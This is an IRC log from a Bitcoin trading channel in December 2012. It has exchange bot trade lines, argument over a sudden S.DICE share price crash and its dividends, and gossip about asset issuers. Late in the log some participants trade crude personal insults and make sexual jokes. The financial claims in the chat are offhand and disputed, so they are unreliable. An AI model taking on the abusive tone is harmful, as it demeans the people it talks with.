Dec 21 19:26:17 were you buying ? Dec 21 19:27:55 smickles: Usagi had opened a ticket on BF asking to list BMF. I replied asking what his intentions were with the asset. He seems to have a pretty questionable history. Dec 21 19:28:08 I got an email from btct.co a few min ago saying that BMF had been listed. Dec 21 19:28:17 mircea_popescu: oh, I guess that would've missed me anyway then :P Dec 21 19:28:17 So I guess he didnt wanna answer my question. :P Dec 21 19:29:05 yeah, don't question usagi if you want him to pretend to do something Dec 21 19:29:22 lol Dec 21 19:29:53 I dont midn shrugging the scamish assets onto the others Dec 21 19:30:07 It's really more of a positive thing I think Dec 21 19:30:08 :P Dec 21 19:30:13 anyway, i think my WoT rating of him puts my position clearly, he defaulted, an made good after default, but that's no reason for me to trust him now. Dec 21 19:31:05 at least he made good so *shrug* Dec 21 19:31:40 defaulting seems to have happened more than once for him in the past. Dec 21 19:32:15 I want to get rid of 115 gigamining shares since I am not going to send my personal information to a kid behind his computer calling himself a lawyer, someone wants to take them Dec 21 19:33:28 iirc you can't do that. Dec 21 19:33:52 i bet you can with psy's life rights or something Dec 21 19:33:59 power of attorney in this matter Dec 21 19:34:59 is romainia like a weekend trip's distance from finland? Dec 21 19:35:26 yeah Dec 21 19:36:04 whatcha need? Dec 21 19:36:14 1k btc aaand i'll do it Dec 21 19:36:39 (includes tickets to there and back + a simple job with no harm to anyone) Dec 21 19:36:45 i think it's like 10-12 hours on train Dec 21 19:36:49 europe has excellent trains Dec 21 19:36:53 its more i guess Dec 21 19:36:56 well yeah Dec 21 19:36:58 being high density unlike the us Dec 21 19:37:42 Ukto: is BMF getting re-listed? Oh nooo.... :) I hope usagi has learned something from his previous fuck ups Dec 21 19:37:49 ;;google distance timisoara Espoo Dec 21 19:37:50 Booking.com: Hotel Continental, Timişoara, Romania - 185 Guest ...: ; Jari Saarinen - AS-laitos - Aalto-yliopisto: ; IEEE Xplore - Intelligent Computer Communication and Processing ...: Dec 21 19:37:59 pff Dec 21 19:38:35 https://btct.co/security/BMF Dec 21 19:38:59 wow usagi returns? Dec 21 19:39:06 Anduck: well, yeah, i was going to suggest you find out if mircea_popescu actually has a sex dungeon, but I wasn't going to pay hardly any btc to help out the venture. Dec 21 19:39:14 read the asset details Dec 21 19:39:15 its funny Dec 21 19:39:16 :P Dec 21 19:39:21 you will get some laughs Dec 21 19:39:26 you understand that you have to go to Russia or take 2 boats, if you want to use a train for that Dec 21 19:39:29 2.2k km Dec 21 19:39:59 you just ferry across to like estonia Dec 21 19:40:11 omg the saga continues Dec 21 19:40:11 lol, sure Dec 21 19:40:51 smickles : send the missus, i send back pics ? Dec 21 19:41:18 sounds like a plan Dec 21 19:41:20 :P Dec 21 19:41:32 PsychoticBoy: sounds like it. Round #2, lots of miscalculated NAV's and other BS :) Dec 21 19:41:39 something like http://polimedia.us/dtng/c/src/135186901024.jpg Dec 21 19:42:04 [MPEX] [S.MPOE] 5366 @ 0.00062 = 3.3269 BTC [+] Dec 21 19:45:41 mircea_popescu: hmm, i see several better sticks available Dec 21 19:45:56 before or after ? Dec 21 19:46:48 Explain how your products and services are competitive. Dec 21 19:46:48 --- Nobody could compete with us when I listed on the GLBSE, We blew MU, SS, Dec 21 19:46:48 MINING and other funds out of the water. We were about 5 times bigger than every Dec 21 19:46:48 other fund on GLBSE put together (from what I've seen of people's balance Dec 21 19:46:48 statements). For some reason or other, people liked how I ran things. Dec 21 19:46:51 lollol Dec 21 19:46:56 [MPEX] [S.MPOE] 5700 @ 0.00062 = 3.534 BTC [+] Dec 21 19:47:04 my FDBF was far more better Dec 21 19:47:10 lol "(Have to admit, I wasn't expecting this, and I lost the original BMF contract Dec 21 19:47:12 when GLBSE went down. I'll propose this, and I'd like to make any changes you Dec 21 19:47:14 suggest)" Dec 21 19:47:27 lol wait, usagi was ever big ? Dec 21 19:47:32 iirc never over 1-2k btc, was he ? Dec 21 19:47:34 I guess this is what you get, when you delete your own posts Dec 21 19:47:40 big jerk Dec 21 19:47:45 dmc was 5x that when it started ffs. Dec 21 19:47:50 mircea_popescu: total was about 8K BTC Dec 21 19:47:59 total cpa + nyan + bmf Dec 21 19:48:01 lol, SS stayed small intentionally Dec 21 19:48:19 lol he blew ss ? Dec 21 19:48:28 should i snap out the visual aids for that "blew" ? Dec 21 19:48:47 Usagi himself even claimed he wanted to place 10000 btc with us Dec 21 19:49:25 mircea_popescu: use that pic of me with a smirk holding the camera, it's like i'm holding his poney-tails Dec 21 19:49:48 well, usagi is a valuable dramadition to any exchange that'll have him. Dec 21 19:51:07 http://photobook.bitvps.com/index.php/ Dec 21 19:51:46 ahahaah remember the good old days Dec 21 19:53:49 but no, i was thinking more blew in the sense of http://polimedia.us/dtng/c/src/135601348721.gif Dec 21 19:56:14 [MPEX] [S.MPOE] 4850 @ 0.00062 = 3.007 BTC [+] Dec 21 20:08:04 mircea_popescu: Why doesn't MPEx display open interest on options like MPOE used to? Dec 21 20:10:27 [MPEX] [S.DICE] 821 @ 0.00358628 = 2.9443 BTC [-] Dec 21 20:10:28 [MPEX] [S.DICE] 369 @ 0.00355917 = 1.3133 BTC [-] Dec 21 20:10:30 [MPEX] [S.DICE] 410 @ 0.00349819 = 1.4343 BTC [-] Dec 21 20:10:47 boom the short is closed Dec 21 20:11:51 [MPEX] [S.MPOE] 12621 @ 0.00062 = 7.825 BTC [+] Dec 21 20:19:23 breaking news, s.mpoe is worth as much as we want to trust mircea_popescu Dec 21 20:23:47 smickles lol yeah Dec 21 20:24:22 re the open interest... already so many numbers in there ;/ Dec 21 20:25:38 re blog comment : for every 500 btc i make smpoe must appreciate by 5k ? is this sustainable ? Dec 21 20:26:42 [MPEX] [S.DICE] 1500 @ 0.0036 = 5.4 BTC [+] Dec 21 20:27:24 [MPEX] [S.MPOE] 11475 @ 0.00062 = 7.1145 BTC [+] Dec 21 20:34:51 ;;later tell namjies https://bitcointalk.org/index.php?topic=131922.0 Dec 21 20:34:51 The operation succeeded. Dec 21 20:45:44 so they are on a verge of going out of business? Dec 21 20:46:10 who? Dec 21 20:46:26 https://bitcointalk.org/index.php?topic=131922.0 Dec 21 20:46:31 sounds really bad Dec 21 20:47:22 huh Dec 21 20:47:38 did someone steal EskimoBob's handle Dec 21 20:48:28 EskimoBob tis unclear. new team trying to turn things around Dec 21 20:48:38 [MPEX] [S.MPOE] 6000 @ 0.00062 = 3.72 BTC [+] Dec 21 20:48:48 I hope they do and good luck with that. Dec 21 20:50:11 ;;bc,stats Dec 21 20:50:13 Current Blocks: 213054 | Current Difficulty: 3370181.7992778 | Next Difficulty At Block: 213695 | Next Difficulty In: 641 blocks | Next Difficulty In About: 5 days, 8 hours, 22 minutes, and 41 seconds | Next Difficulty Estimate: 2919948.29465722 | Estimated Percent Change: -13.3593239604 Dec 21 20:50:30 whoa Dec 21 20:50:39 jurov live.coinbr.com is down ? Dec 21 20:50:51 gigavps yes, diff has been dropping steadily. Dec 21 20:50:52 BTW, 5519 shares left and div date is 22 so get in and enjoy Dec 21 20:51:31 something that crawls up at 4-7% per week has to drop sooner or later Dec 21 20:51:35 EskimoBob i thought you only bought turds, i didn't know you were selling them Dec 21 20:51:40 and after halving... Dec 21 20:51:41 lol Dec 21 20:51:51 heh Dec 21 20:51:56 i do not do mining gigavps so thy can not be turds Dec 21 20:52:05 turd business is all yours, gigavps Dec 21 20:52:10 i guess everyone was hoping for price spike, that didn'ty happen so miners are going offline Dec 21 20:52:11 :) Dec 21 20:52:17 worst scenario for btc, but hey. it's what it is. Dec 21 20:52:27 asic will arrive soon enough Dec 21 20:52:28 also means miner market is pretty much saturated/no more dollars pouring in Dec 21 20:52:39 ^ +1 Dec 21 20:52:56 which means asic companies have all the money they will everget, period. Dec 21 20:52:59 and imaginary ASICS have not materialized so what else is there to expect Dec 21 20:53:07 if they fail to make asics in these runs, there's no asics in 2013 at all. Dec 21 20:53:12 and i suspect this is the more likely outcome. Dec 21 20:53:30 no asic in 2013 = butthurt for me Dec 21 20:53:56 2013 Feb. is the most optimistic Dec 21 20:54:30 so it's more like May if history repeats... and it usually does Dec 21 20:54:53 lol Dec 21 20:54:57 EskimoBob may is impossible. either jan, feb or march in degrading order of likeliness Dec 21 20:54:59 or else next year. Dec 21 20:55:03 EskimoBob does have a point there Dec 21 20:55:05 all this due to capital constraints Dec 21 20:55:07 well - October/November = Feb/March for BFL Dec 21 20:55:12 this was proven before Dec 21 20:55:15 ;) Dec 21 20:55:35 has bASIC stopped communicating all together? Dec 21 20:55:48 bASIC is Thom? Dec 21 20:55:51 saw a couple posts of disgrunted people in the forums Dec 21 20:55:53 yep Dec 21 20:56:05 money flow cumulative is at all time high Dec 21 20:56:14 i do find it interesting that he was only active when he wanted everyone's money Dec 21 20:56:16 and saw they are rebuying (or he) fpga stuff at $.20 on the dollar Dec 21 20:56:22 buyers still buying Dec 21 20:56:33 maybe my numbers are a tad off Dec 21 20:56:41 kakobrekla where did you get that stat? Dec 21 20:56:47 tbh i think we are headed for a recession. Dec 21 20:56:52 hold on Dec 21 20:59:04 http://shrani.si/f/36/Ao/4Zj9Ykv7/mfchigh.png Dec 21 20:59:07 there ya go gigavps Dec 21 20:59:39 blue == buy? Dec 21 20:59:52 red is price Dec 21 20:59:56 blue is money flow Dec 21 21:00:11 wow Dec 21 21:00:24 it's higher than at the $29 peak Dec 21 21:00:35 i told you it is all time high Dec 21 21:00:49 holy fuckballs Dec 21 21:01:19 this from Gox? Dec 21 21:01:19 so the moneyflow scale is on the right? Dec 21 21:01:29 yes gox Dec 21 21:01:30 might color the axis red and blue Dec 21 21:01:33 left Dec 21 21:01:35 make it easier to discern Dec 21 21:01:39 left is money flow right is price Dec 21 21:01:44 kk Dec 21 21:01:58 btw Dec 21 21:02:04 money flow oscilator owns with bitcoin Dec 21 21:02:05 ;) Dec 21 21:02:43 kakobrekla im not sure i trust that data. Dec 21 21:02:49 k Dec 21 21:02:49 interefsting that price hasn't moved much despite the moneyflow Dec 21 21:03:00 last time you had this moneyflow price went up about 4x Dec 21 21:03:04 its pooling data with sierra chart plugin Dec 21 21:03:06 so data is fine Dec 21 21:03:14 for one, outflow far exceeds total inflow at most points. Dec 21 21:03:18 this is a logical impossibility Dec 21 21:03:34 [MPEX] [S.MPOE] 1500 @ 0.00062 = 0.93 BTC [+] Dec 21 21:03:54 makes sense Dec 21 21:04:00 taking BTC to USD Dec 21 21:04:15 or some other currency Dec 21 21:04:22 volume made on uptick is bull on downtick is bear Dec 21 21:04:22 outflow is outflow Dec 21 21:04:26 maybe i am not "getting" the graph Dec 21 21:04:30 you can't have more outflow than the total inflow to date. Dec 21 21:05:20 sell X.IDIFF.MAR Dec 21 21:05:22 only btc usd on gox Dec 21 21:05:28 not all btc traded every everywhere Dec 21 21:05:30 even so. Dec 21 21:05:42 mircea_popescu: I see your point... Dec 21 21:05:48 it would propose most outflow goes through gox but not most inflow, which is nonsense Dec 21 21:05:52 it's the other way around if anything Dec 21 21:06:03 gox is used miostly for inflow, people take money out privately. Dec 21 21:06:05 is about the direction of trade Dec 21 21:06:10 yes. Dec 21 21:06:29 I would think the opposite - most epople sell via mtgox as price is highest (generally) Dec 21 21:06:38 and buy elsewhere where prices are lower Dec 21 21:06:38 nah cause people don't want the kyc Dec 21 21:06:39 ni Dec 21 21:06:42 no Dec 21 21:06:50 inflow yo Dec 21 21:06:51 the buyers are many and small timers, the sellers are few and sell large chunks Dec 21 21:06:54 not the other way around Dec 21 21:07:14 mircea_popescu: btc recession? Dec 21 21:07:16 Then I break the rules Dec 21 21:07:36 the chart is fine Dec 21 21:07:58 perhaps we should call it cumulative delta Dec 21 21:08:03 http://www.trade2win.com/articles/1670-trading-cumulative-delta-indicator Dec 21 21:08:05 JWU42 obviously not actual rules, just tendencies Dec 21 21:08:13 heh Dec 21 21:08:15 I know Dec 21 21:08:22 rules isn't the best word choice Dec 21 21:09:05 o, well if its +delta then sure. Dec 21 21:09:10 orders rather than actual trades Dec 21 21:09:26 that's a sentiment guesser not a historical descriptor. Dec 21 21:10:51 its trades Dec 21 21:11:01 its actual trades that happend with market orders Dec 21 21:11:06 no limit order data Dec 21 21:11:40 mmm Dec 21 21:12:13 how do you even distinguish market from limit orders on mtgox, do they mark them in some api output ? Dec 21 21:12:19 if one buys at market its obvious that on the other side there is a lmit order to be filled Dec 21 21:12:56 a trade can be eitgher limit crossing limit or market crossing limit Dec 21 21:13:05 i thought you said above this data is market orders only ? Dec 21 21:13:37 in other news, btcjam lol. https://bitcointalk.org/index.php?topic=112447.msg1413923#msg1413923 Dec 21 21:13:45 with mtgox you cant place a bid limit over ask Dec 21 21:14:20 o srsly ? Dec 21 21:14:23 ya Dec 21 21:14:30 i guess it shows i never use it lol Dec 21 21:16:01 its more useful for btc than anything else Dec 21 21:25:25 [MPEX] [S.MPOE] 13101 @ 0.00062 = 8.1226 BTC [+] Dec 21 21:36:30 [MPEX] [S.MPOE] 3800 @ 0.00062 = 2.356 BTC [+] Dec 21 21:45:37 [MPEX] [S.MPOE] 8848 @ 0.00062 = 5.4858 BTC [+] Dec 21 21:50:47 that btcjam is BAD Dec 21 21:50:50 ugh Dec 21 21:51:00 urlpls Dec 21 21:51:28 the one MP posted just above Dec 21 21:51:46 77% repayment Dec 21 21:51:51 or 23% scam Dec 21 21:51:55 BAD BAD BAD Dec 21 21:52:08 well - maybe not scam Dec 21 21:52:17 but not something that gets me excited to lend Dec 21 21:52:20 its laughable Dec 21 21:52:27 works out to like -99% API ? lol Dec 21 22:01:04 [MPEX] [S.MPOE] 2850000 @ 0.00062 = 1767 BTC [+] Dec 21 22:02:17 http://trilema.com/2012/is-smpoe-really-worth-that-much/#comment-91079 Dec 21 22:02:23 lmao this is today's top comedy Dec 21 22:04:04 [MPEX] [O.BTCUSD.C120T] 420 @ 0.11564518 = 48.571 BTC [-] Dec 21 22:09:10 damn you mp Dec 21 22:09:23 + they talk horribad english Dec 21 22:09:23 !! Dec 21 22:09:36 "or you can cover your debts with a loan from yourself by this EU third party whom mystifies stuff, which is state business again.. and any government is fraudulent." Dec 21 22:09:37 !!! Dec 21 22:10:28 [MPEX] [S.MPOE] 6483 @ 0.00062 = 4.0195 BTC [+] Dec 21 22:11:30 mircea_popescu: the first comment. i understood nothing Dec 21 22:11:55 join the clubn Dec 21 22:11:57 except the final part, that one i got Dec 21 22:20:18 jurov: live.coinbr.com down? Dec 21 22:22:52 yea. bitvps Dec 21 22:24:29 [MPEX] [S.MPOE] 10600 @ 0.00062 = 6.572 BTC [+] Dec 21 22:32:21 [MPEX] [S.MPOE] 6750 @ 0.00062 = 4.185 BTC [+] Dec 21 22:36:38 [MPEX] [S.MPOE] 9098 @ 0.00062 = 5.6408 BTC [+] Dec 21 22:51:23 thestringpuller: I'm chatting here via a bitvps server :o Dec 21 22:53:15 Not all servers are alright. Dec 21 23:00:07 [MPEX] [S.MPOE] 7200 @ 0.00062 = 4.464 BTC [+] Dec 21 23:08:08 This doesn't mean that it's doom and gloom. (though we've had plenty of that already). What it means is that I won't have time to maintain the miners, keep things running, or run the sites/infrastructure. Dec 21 23:08:08 So this means either: Dec 21 23:08:08 A) BTCSYN will be shut down, and we'll figure out a sane way to do that (liquidate and pay out to shareholders using this list) Dec 21 23:08:08 B) Someone else will need to pick up the torch and continue operation (At the vote of shareholders). Dec 21 23:08:08 C) Some other alternative I haven't thought of yet. Dec 21 23:09:02 IF we decide to liquidate (ie no other alternative is presented) be aware that the debt to enterpoint is larger than our current liquid assets, and the liquidatable value of those other 4 boards isn't very high with ASICs around the corner. Ideally another alternative will be possible. We'll see in the newyear. Dec 21 23:09:39 Good grief... Dec 21 23:09:47 i forgot the quotes again Dec 21 23:09:54 IT IS NOT ME GOING OUT OF BUSINESS PEOPLE Dec 21 23:09:57 I AM QUOTING. Dec 21 23:09:58 ty. Dec 21 23:10:59 I usually understand that by the immediately following statement mentionning that X business is going down. Dec 21 23:11:11 ya well i nearly created a panic yest Dec 21 23:11:19 BTCSYN? Dec 21 23:11:19 or the failure statement including things that you're not even in business in. Dec 21 23:11:39 i don't remember who it was i was quoting, but a few people were spooked. Dec 21 23:11:54 o, the bitcoin-market.eu it was. Dec 21 23:12:11 ;;ticker Dec 21 23:12:12 BTCUSD ticker | Best bid: 13.47429, Best ask: 13.56797, Bid-ask spread: 0.09368, Last trade: 13.47425, 24 hour volume: 29638.17165934, 24 hour low: 13.41999, 24 hour high: 13.64750, 24 hour vwap: 13.54771 Dec 21 23:12:41 [MPEX] [S.MPOE] 3986 @ 0.00062 = 2.4713 BTC [+] Dec 21 23:12:48 !ticker s.mpoe Dec 21 23:12:49 [MPEX:S.MPOE] 1day: 0.00062 / 0.00062 / 0.00062 (3767064 shares, 2,335.58 BTC), 30day: 0.00049308 / 0.00054214 / 0.00063995 (104595129 shares, 56,705.52 BTC) Dec 21 23:13:02 There wasn't much in that quote other than money was lost and the business was attempted to be kept afloat to recoup loss through fees or something like that. Dec 21 23:13:11 ;;calc (0.00062/0.00054214) ** 12 Dec 21 23:13:12 5.00452492634 Dec 21 23:13:14 For once that could potentially have been applied to MPEx Dec 21 23:13:18 500%. ftw. Dec 21 23:13:30 Namjies ya, i wasn't too careful. Dec 21 23:13:45 [MPEX] [S.MPOE] 3300 @ 0.00062 = 2.046 BTC [+] Dec 21 23:18:01 what if a transaction never gets put into a block? Dec 21 23:19:15 thestringpuller: make a new transaction with a fee Dec 21 23:19:34 but when will the original transaction die? Dec 21 23:19:44 when it is at 0% network prop? Dec 21 23:21:19 a transaction with an higher fee has priority over the same output with a lesser fee, I believe. Dec 21 23:23:33 depends on the miner (or pool), different pools implement it differently i think Dec 21 23:28:20 a broadcast transaction pretty much never dies if i understand this correctly Dec 21 23:28:24 unless some of its input is spent Dec 21 23:29:23 ummm Dec 21 23:29:31 afaik its discarded after a while Dec 21 23:29:35 if it doesnt get confirmed Dec 21 23:29:40 one would need to resend Dec 21 23:29:57 seems to be right thing to do Dec 21 23:30:08 or else we could build infinitive queue Dec 21 23:31:32 Namjies https://bitcointalk.org/index.php?topic=131922.msg1414201;topicseen#msg1414201 Dec 21 23:32:07 [MPEX] [S.MPOE] 18850 @ 0.00062 = 11.687 BTC [+] Dec 21 23:41:55 ;;tslb Dec 21 23:41:59 Time since last block: 1 minute and 38 seconds Dec 21 23:47:49 [MPEX] [S.MPOE] 5939 @ 0.00062 = 3.6822 BTC [+] Dec 21 23:48:20 EskimoBob: how many dmc shares do you even have? Dec 21 23:49:37 if its not a large fraction of the missing 300 some shares, why bother me over it Dec 21 23:50:10 [MPEX] [S.DICE] 96 @ 0.00349819 = 0.3358 BTC [-] Dec 21 23:50:12 [MPEX] [S.DICE] 1700 @ 0.00348464 = 5.9239 BTC [-] Dec 21 23:50:13 [MPEX] [S.DICE] 2250 @ 0.00346752 = 7.8019 BTC [-] Dec 21 23:50:14 [MPEX] [S.DICE] 1500 @ 0.00346504 = 5.1976 BTC [-] Dec 21 23:50:15 [MPEX] [S.DICE] 2500 @ 0.00345578 = 8.6395 BTC [-] Dec 21 23:50:17 [MPEX] [S.DICE] 1050 @ 0.00344559 = 3.6179 BTC [-] Dec 21 23:50:18 [MPEX] [S.DICE] 5587 @ 0.00343861 = 19.2115 BTC [-] Dec 21 23:50:19 [MPEX] [S.DICE] 4700 @ 0.00342636 = 16.1039 BTC [-] Dec 21 23:50:19 [MPEX] [S.DICE] 600 @ 0.00339841 = 2.039 BTC [-] Dec 21 23:50:20 [MPEX] [S.DICE] 1041 @ 0.00337007 = 3.5082 BTC [-] Dec 21 23:50:21 [MPEX] [S.DICE] 7495 @ 0.00190012 = 14.2414 BTC [-] Dec 21 23:50:22 [MPEX] [S.DICE] 208020 @ 0.00190011 = 395.2609 BTC [-] Dec 21 23:50:23 [MPEX] [S.DICE] 506 @ 0.00190007 = 0.9614 BTC [-] Dec 21 23:50:24 [MPEX] [S.DICE] 5000 @ 0.00190001 = 9.5001 BTC [-] Dec 21 23:50:26 [MPEX] [S.DICE] 507115 @ 0.0018 = 912.807 BTC [-] Dec 21 23:50:27 [MPEX] [S.DICE] 995840 @ 0.0014 = 1394.176 BTC [-] Dec 21 23:50:30 o.o Dec 21 23:50:39 no fucking way. Dec 21 23:50:45 FUCK Dec 21 23:50:57 I should have had a bid in! Dec 21 23:51:12 Why didn't I have more BTC available for this! Dec 21 23:51:28 !ticker s.dice Dec 21 23:51:28 I wanted to have bids in... Dec 21 23:51:30 [MPEX:S.DICE] 1day: 0.0014 / 0.00161337 / 0.0036 (1753279 shares, 2,828.70 BTC), 30day: 0.0014 / 0.00308387 / 0.0037 (9053859 shares, 27,921.00 BTC) Dec 21 23:51:46 breathtaking. -50% 1day avg Dec 21 23:53:19 i took the bid out. Dec 21 23:53:25 ;> Dec 21 23:53:31 i win! Dec 21 23:53:38 haha Dec 21 23:53:50 lol? Dec 21 23:53:53 Which one? Dec 21 23:53:56 who offloaded Dec 21 23:54:10 and why? Dec 21 23:54:33 good q. Dec 21 23:54:53 whoever got that 1394btc worth at .0014 should be happy Dec 21 23:54:57 come dividend day Dec 21 23:55:14 i had a bid at 18 for a while Dec 21 23:55:25 smickles ya srsly. Dec 21 23:55:32 what's it projected to pay anymore ? Dec 21 23:56:35 ;;calc (30000-16000)/100000000 Dec 21 23:56:36 0.00014 Dec 21 23:56:42 a 100% dividend Dec 21 23:56:55 *monthly Dec 21 23:56:58 no fuycking way ?! Dec 21 23:57:28 10% man. Dec 21 23:57:32 it's 0.0014 Dec 21 23:57:35 wat Dec 21 23:57:41 smickles: next div day will not be as nice as those so far Dec 21 23:57:54 LOL Dec 21 23:58:01 did S.DICE just go down like hell Dec 21 23:58:01 xD Dec 21 23:58:03 EskimoBob next div day its projected to pay as much as TOTAL so far. Dec 21 23:58:05 my luck indeed. Dec 21 23:58:29 do the math. There will me more shares outstanding to share the income Dec 21 23:58:33 it should pop back up soon tho Dec 21 23:58:56 I see no fundamental difference b/t now and earlier Dec 21 23:58:58 no there won't lol. Dec 21 23:59:16 EskimoBob, on MPEx, all shares even non-outstanding get dividends. Dec 21 23:59:25 mircea_popescu: are you telling me, that they can not sell any shares from III ? Dec 21 23:59:28 it's always been divided to 100 mn Dec 21 23:59:37 WHAT Namjies! Dec 21 23:59:53 So no more shares to split. Beside, each share represent 100 000 000th of SatoshiDice income. Dec 21 23:59:55 are you serious? Dec 22 00:00:07 EskimoBob: the other 90000000shares are not treasury stock Dec 22 00:00:11 EskimoBob, yes... Dec 22 00:00:33 happy 22th day! Dec 22 00:00:37 ty. Dec 22 00:00:46 Evoorhees keeps 90% of revenue, the 10 million he's selling is for 10% of revenue. Dec 22 00:00:47 22th day? Dec 22 00:01:04 Otherwise SatoshiDice would be paying 10-20% per month... Dec 22 00:01:12 sure but the ones he has not sold in IPO can not get divs or ... Dec 22 00:01:17 smickles: day changed in finland Dec 22 00:01:25 fuck, this IPO is even bigger fuck up than I ever imagined Dec 22 00:01:32 Anduck: you fins celebrate the 22nd? Dec 22 00:01:39 nah... we don't actually Dec 22 00:01:43 EskimoBob, the dividends shown on MPEx is for 10 million shares. Dec 22 00:01:47 i just happened to notice it at 00:00 Dec 22 00:02:00 heh, you had me baffled Anduck Dec 22 00:02:06 or 10% of SD's income. Dec 22 00:02:14 well uhmm whats happening to SD? Dec 22 00:02:17 EskimoBob: i don't understand what you are upset about Dec 22 00:02:20 The other 90% Evoorhees keep. Dec 22 00:02:22 did my shares just lose all its value? Dec 22 00:02:45 smickle, I am not upset at all but who keeps the divs on shares not sold on IPO? Dec 22 00:02:46 yes they are worthless Dec 22 00:02:49 send em over. Dec 22 00:02:52 jeez. Dec 22 00:02:53 ok Dec 22 00:02:59 what bitcoin address i sent Dec 22 00:03:01 sned * Dec 22 00:03:03 EskimoBob, Evoorhees... Dec 22 00:03:09 really? Dec 22 00:03:13 ye Dec 22 00:03:20 LOL Dec 22 00:03:21 Anduck: someone just sold a bunch, for personal reasons it seems because there isn't any bad news out there Dec 22 00:03:24 Otherwise, what, someone buy one share and no one else and that person gets everything? Dec 22 00:03:28 alright, smickles.. Dec 22 00:03:32 [MPEX] [S.MPOE] 21200 @ 0.00062 = 13.144 BTC [+] Dec 22 00:03:38 big double spend commin up! Dec 22 00:04:00 also pirate paid yesterday. Dec 22 00:04:00 lol kakobrekla Dec 22 00:04:06 That share didn't finance the whole of SatoshiDice. SatoshiDice was already financed. Dec 22 00:04:07 big 0.1 bets to <1 handle winning streak incoming Dec 22 00:04:19 SatoshiDice went public. Dec 22 00:04:19 Namjies: you kno what treasury stock is and why shares have that "status"? Dec 22 00:04:41 it's funny watching EskimoBob doing the usagi thing Dec 22 00:04:43 Namjies: sdice wash NEVER financed Dec 22 00:04:47 Anduck: if you look at the chart, this happend a couple of times already and it recovered within 24 hrs Dec 22 00:04:54 alright Dec 22 00:05:13 shuuttup smickles almost got the shares. Dec 22 00:05:18 he pulled a number out of his ass, mircea_popescu helped him to sell this garbage and now you have, what ever you have there :) Dec 22 00:05:25 [MPEX] [S.DICE] 300 @ 0.00359 = 1.077 BTC [+] Dec 22 00:05:32 EskimoBob: it was, by evoorhees, for initial development and servers... that's still financement. Dec 22 00:05:43 the largest revenue generator in btc, is what you have there. Dec 22 00:05:48 Plus no part of the 100 million shares was ever treasury stock. Dec 22 00:05:55 mircea_popescu: usagi thing? And hat is that? Dec 22 00:05:55 you don't like it, stick to making mud pies or w/e you're making. Dec 22 00:06:13 usagi thing. clueless stupidity acting as if it knows shit. Dec 22 00:06:28 [MPEX] [S.MPOE] 22600 @ 0.00062 = 14.012 BTC [+] Dec 22 00:06:31 mircea_popescu: talk about yourself :) Dec 22 00:06:47 eskimobob why you such a troll? Dec 22 00:06:47 sigh, lemme dig it. Dec 22 00:07:51 EskimoBob, there is nothing wrong in all of this... SatoshiDice was already an established business. It went public with 100 million shares owned by Evoorhees since he owns his business. Buying shares of S.DICE means you buy an interest in SD off of him. Dec 22 00:08:01 He's still entitled to any interest on shares not sold. Dec 22 00:08:04 thestringpuller: I am not a troll at all. If you do not understand, why you got fucked, sorry Dec 22 00:08:31 so EskimoBob doesnt understand how companies go public? Dec 22 00:08:34 im not fucked? Dec 22 00:08:38 Sep 04 22:47:33 I know more about finance than you could possibly understand mircea Dec 22 00:08:40 The rest of the shares were never treasury stock. Dec 22 00:08:48 there, not even three months. Dec 22 00:08:50 mircea_popescu: hehehehehehehheheeheh Dec 22 00:08:50 september 4th ahh Dec 22 00:08:54 thestringpuller: did you go short? Dec 22 00:09:01 No, I think EskimoBob was simply under the impression the rest was claimed to be treasury stock when it's not. Dec 22 00:09:21 Namjies: yes I was Dec 22 00:09:37 [MPEX] [S.MPOE] 3700 @ 0.00062 = 2.294 BTC [+] Dec 22 00:10:30 It's not, so no scam there. SD was paying about 1% per month. Dec 22 00:10:50 It was indeed low, quite low... Dec 22 00:10:51 I guess it's all OK then :) Dec 22 00:11:05 But you could easily calculate and know that if you read before buying. Dec 22 00:11:24 Considering it's one of the most trustable business out there, that 1% is still good. Dec 22 00:11:28 i had only few shares of this crap for lulz, so I do not really care Dec 22 00:12:49 no, you had only a few shares because that's all you actually can afford, and yes, you are quite the lulz. Dec 22 00:12:56 Namjies: do you see, how this business can really grow from where it's now? Dec 22 00:13:12 dude. it made its lifetime income in the last month. Dec 22 00:13:16 is that so hard ? Dec 22 00:13:23 for instance, you will never make this many btc Dec 22 00:13:26 in your whole life.\ Dec 22 00:13:26 mircea_popescu: your obsession of money only shows how poor you actually are. LOL Dec 22 00:13:33 ding dong. Dec 22 00:13:55 exactly ding dong Dec 22 00:14:20 blind dog goes to mt fiji. "your obsession with clouds shows how small you really are". Dec 22 00:14:30 yes, i'm sure mt fiji is within the size purvey of blind dogs. Dec 22 00:15:37 [MPEX] [S.MPOE] 6359 @ 0.00062 = 3.9426 BTC [+] Dec 22 00:15:38 [MPEX] [S.DICE] 2701 @ 0.00359 = 9.6966 BTC [+] Dec 22 00:15:48 now, go reload your porn site, you lonely fuck :) and count your 2 coins, while you are at it LOL! Dec 22 00:16:32 i wish i had 2 coins. Dec 22 00:16:41 mircea_popescu, pathetic little man, always counting other peoples money Dec 22 00:16:48 [MPEX] [S.MPOE] 4451 @ 0.00062 = 2.7596 BTC [+] Dec 22 00:17:31 2 coins are good cause they make more coins. Dec 22 00:18:31 just make sure they're a boy coin and a girl coin. Dec 22 00:18:31 [MPEX] [S.DICE] 3 @ 0.00359 = 0.0108 BTC [+] Dec 22 00:19:51 what is it mircea_popescu, still have problems getting a women? Go see a specialist about your complexes Dec 22 00:20:56 if this guy turns out to have actually BEEN usagi all along, and set up the arguing with himself and all, it'll be on boxxy level of sad. Dec 22 00:21:21 remind me, why is boxxy sad Dec 22 00:21:38 usagi was your big pall, mircea_popescu. Dec 22 00:22:00 kakobrekla trying to remember, is she the one with the backtracing ? Dec 22 00:22:01 I can see, how you two dimwitted fucks fit Dec 22 00:22:23 boxxy as in boxxy is dead, or boxxy the forum dweller? Dec 22 00:22:53 the youtube freak Dec 22 00:23:01 boxxy as in you're behind 10 of them? Dec 22 00:23:24 i dont know what the shit was about that girl Dec 22 00:23:31 i just remembers some pics somewhere Dec 22 00:23:33 virgins Dec 22 00:23:36 lots of them Dec 22 00:23:39 ;;google i've backtraced it Dec 22 00:23:40 (EXTENDED REMIX) Because I Back-Traced It (You dun goofed up ...: ; Urban Dictionary: Back-Traced It: ; Urban Dictionary: back traced: Dec 22 00:23:44 that's her right ? Dec 22 00:24:25 no Dec 22 00:24:35 not the boxxy i know an love Dec 22 00:24:49 o ? Dec 22 00:24:59 http://www.youtube.com/watch?v=Yavx9yxTrsw Dec 22 00:25:15 I actually used gaia when this happened Dec 22 00:25:39 needs flash Dec 22 00:25:47 oh, http://www.youtube.com/watch?v=VcydqSpYN00 that's the originaly Dec 22 00:26:06 you 